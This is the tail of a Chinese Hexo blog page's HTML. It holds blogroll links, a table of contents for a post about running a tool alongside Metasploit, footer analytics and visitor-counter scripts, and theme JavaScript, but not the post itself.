                <li class="links-of-blogroll-item">
                  <a href="http://cq.dropsec.xyz" title="qiqi" target="_blank">qiqi</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://yunnigu.dropsec.xyz" title="云" target="_blank">云</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://isron.cn" title="Isron" target="_blank">Isron</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://flashsec.cn" title="Flash|Sec" target="_blank">Flash|Sec</a>
                </li>
              
            </ul>
          </div>
        

        


      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#0x01-安装与运行"><span class="nav-number">1.</span> <span class="nav-text">0x01 安装与运行</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x02-参数详情"><span class="nav-number">2.</span> <span class="nav-text">0x02 参数详情</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x03-基本运行"><span class="nav-number">3.</span> <span class="nav-text">0x03 基本运行</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x04-与msf进行联动"><span class="nav-number">4.</span> <span class="nav-text">0x04 与msf进行联动</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <script async src="https://dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js"></script>
<div class="copyright" >
  
  &copy;  2015 - 
  <span itemprop="copyrightYear">2017</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Hello_C</span>
  
  <span class="site-pv">
   <script src="http://s6.cnzz.com/stat.php?id=1261655448&web_id=1261655448" type="text/javascript"></script>
  </span>
  
  <span id="busuanzi_container_site_pv">
    本站总访问量<span id="busuanzi_value_site_pv"></span>次
  </span>
  <span id="busuanzi_container_site_uv">
    本站访客数<span id="busuanzi_value_site_uv"></span>人次
  </span>
</div>
<!-- time -->
  <div id="show-time">
    <span id="span_dt_dt"></span>
  </div>
  <script>
      function show_date_time() {
        window.setTimeout("show_date_time()", 1000);
        BirthDay = new Date("9/1/2016 15:30:01");
        today = new Date();
        //总时间
        timeold = (today.getTime() - BirthDay.getTime());
        sectimeold = timeold / 1000
        secondsold = Math.floor(sectimeold);
        msPerDay = 24 * 60 * 60 * 1000
        e_daysold = timeold / msPerDay
        daysold = Math.floor(e_daysold);
        e_hrsold = (e_daysold - daysold) * 24;
        hrsold = Math.floor(e_hrsold);
        e_minsold = (e_hrsold - hrsold) * 60;
        minsold = Math.floor((e_hrsold - hrsold) * 60);
        seconds = Math.floor((e_minsold - minsold) * 60);
        span_dt_dt.innerHTML = "本站已安全运行 " + daysold + " 天 " + hrsold + " 小时 " + minsold + " 分 " + seconds + " 秒";
      }
     show_date_time();
  </script>


<div class="powered-by">
  由 <a class="theme-link" href="https://hexo.io">Hexo</a> 强力驱动
</div>

<div class="theme-info">
  主题 -
  <a class="theme-link" href="https://github.com/iissnan/hexo-theme-next">
    NexT.Mist
  </a>
</div>


        

        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

  </div>
  
  <!-- 页面点击小红心 -->
  <script type="text/javascript" src="/js/src/love.js"></script>
  <!-- 背景动画 -->
  <script type="text/javascript" src="/js/src/particle.js"></script>
  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  


  











  
  <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>

  
  <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>

  
  <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>

  
  <script type="text/javascript" src="true"></script>


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.1"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.1"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.1"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.1"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.1"></script>



  

  
    
  

  <script type="text/javascript">
    var duoshuoQuery = {short_name:"zjwfc"};
    (function() {
      var ds = document.createElement('script');
      ds.type = 'text/javascript';ds.async = true;
      ds.id = 'duoshuo-script';
      ds.src = (document.location.protocol == 'https:' ? 'https:' : 'http:') + '//static.duoshuo.com/embed.js';
      ds.charset = 'UTF-8';
      (document.getElementsByTagName('head')[0]
      || document.getElementsByTagName('body')[0]).appendChild(ds);
    })();
  </script>

  














  





  

  
  <script src="https://cdn1.lncld.net/static/js/av-core-mini-0.6.4.js"></script>
  <script>AV.initialize("JCRSaBjs1fI4FctoIzV1M8Kh-gzGzoHsz", "HPfVnkuIFClUv2BUNyy20FlB");</script>
  <script>
    function showTime(Counter) {
      var query = new AV.Query(Counter);
      var entries = [];
      var $visitors = $(".leancloud_visitors");

      $visitors.each(function () {
        entries.push( $(this).attr("id").trim() );
      });

      query.containedIn('url', entries);
      query.find()
        .done(function (results) {
          var COUNT_CONTAINER_REF = '.leancloud-visitors-count';

          if (results.length === 0) {
            $visitors.find(COUNT_CONTAINER_REF).text(0);
            return;
          }

          for (var i = 0; i < results.length; i++) {
            var item = results[i];
            var url = item.get('url');
            var time = item.get('time');
            var element = document.getElementById(url);

            $(element).find(COUNT_CONTAINER_REF).text(time);
          }
          for(var i = 0; i < entries.length; i++) {
            var url = entries[i];
            var element = document.getElementById(url);
            var countSpan = $(element).find(COUNT_CONTAINER_REF);
            if( countSpan.text() == '') {
              countSpan.text(0);
            }
          }
        })
        .fail(function (object, error) {
          console.log("Error: " + error.code + " " + error.message);
        });
    }

    function addCount(Counter) {
      var $visitors = $(".leancloud_visitors");
      var url = $visitors.attr('id').trim();
      var title = $visitors.attr('data-flag-title').trim();
      var query = new AV.Query(Counter);

      query.equalTo("url", url);
      query.find({
        success: function(results) {
          if (results.length > 0) {
            var counter = results[0];
            counter.fetchWhenSave(true);
            counter.increment("time");
            counter.save(null, {
              success: function(counter) {
                var $element = $(document.getElementById(url));
                $element.find('.leancloud-visitors-count').text(counter.get('time'));
              },
              error: function(counter, error) {
                console.log('Failed to save Visitor num, with error message: ' + error.message);
              }
            });
          } else {
            var newcounter = new Counter();
            /* Set ACL */
            var acl = new AV.ACL();
            acl.setPublicReadAccess(true);
            acl.setPublicWriteAccess(true);
            newcounter.setACL(acl);
            /* End Set ACL */
            newcounter.set("title", title);
            newcounter.set("url", url);
            newcounter.set("time", 1);
            newcounter.save(null, {
              success: function(newcounter) {
                var $element = $(document.getElementById(url));
                $element.find('.leancloud-visitors-count').text(newcounter.get('time'));
              },
              error: function(newcounter, error) {
                console.log('Failed to create');
              }
            });
          }
        },
        error: function(error) {
          console.log('Error:' + error.code + " " + error.message);
        }
      });
    }

    $(function() {
      var Counter = AV.Object.extend("Counter");
      if ($('.leancloud_visitors').length == 1) {
        addCount(Counter);
      } else if ($('.post-title-link').length > 1) {
        showTime(Counter);
      }
    });
  </script>



  

  

  

  

  

</body>
</html>
